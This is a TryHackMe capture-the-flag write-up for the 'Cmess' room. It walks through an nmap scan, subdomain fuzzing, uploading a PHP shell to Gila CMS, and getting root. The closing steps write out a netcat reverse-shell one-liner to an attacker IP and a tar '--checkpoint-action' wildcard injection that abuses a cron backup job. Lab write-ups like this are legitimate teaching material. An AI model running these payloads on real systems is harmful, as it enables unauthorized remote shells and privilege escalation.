CTF-Writeups/TryHackMe/Cmess.md
2020-12-12 21:18:11 +05:00

4.3 KiB

TryHackMe-Cmess

First of all add the IP that is given to in the /etc/hosts with the domain cmess.thm

NMAP

Nmap scan report for cmess.thm (10.10.212.255)
Host is up (0.42s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.41 seconds

We have port 80 and 22 open so let's see whats on the web page

PORT 80

It is a CMS and it's a simple page nothing's on it.Nmap scan showed us that there are 3 entries in robots.txt so lets see what we can find

So there are three entries there

But we don't have permissions to access that page, so the only option we have right now is to fuzz for directories

Running gobuster didn't help us a much we get only a login page which was useful but as we don't have the creds for now we can't do anything with it. Looking at the hint given in the room it says "Have you tried fuzzing subdomains ?".So I decided to go for wfuzz which is really an awesome tool if you want to fuzz for parameters and subdomains.

So before using tools and fuzz for subdomain what does a subdomain look like ?.

A subdomain is a part of a domain that you own for example in this case we have domain http://cmess.thm now it's subdomain would look like http://blog.cmess.thm or http://support.cmess.thm so this will be our pattern for subdomain. Now let's start fuzzing for subdomain

Here I am using seclists which has a collection of worldists.It's giving us a bunch of subdomain with same lenght of 107l we don't want that so let's remove it with --hl 107 which means hiding lenght with 107 , we can also this thing with characters,words and status codes so it's really handy to know it

Now running it with filters we found a subdomain perfect.

Visting that we will find a conversation with a user and support team which will give us a password to login to that page we found on Gila CMS.

With that username and password we are logged in also it tells us about the version which it's using CMS version 1.10.9.

After we have logged in go to Content > File Manager

And upload you php shell

Access that file with the domain name

We will see a cronjob running on the system

This is creating an archive of the backup folder which is in andre's directory. So we can't really do unless we are in andre's directory so let's run linpeas to find anything juicy to do that first transfer linpeas to target box via netcat or python http server

On running linpeas I found a password file

After logging and having a user flag navigate to /home/andre/backup and these commands and then wait for a minute for a cronjob to trigger

echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

And we are root !!!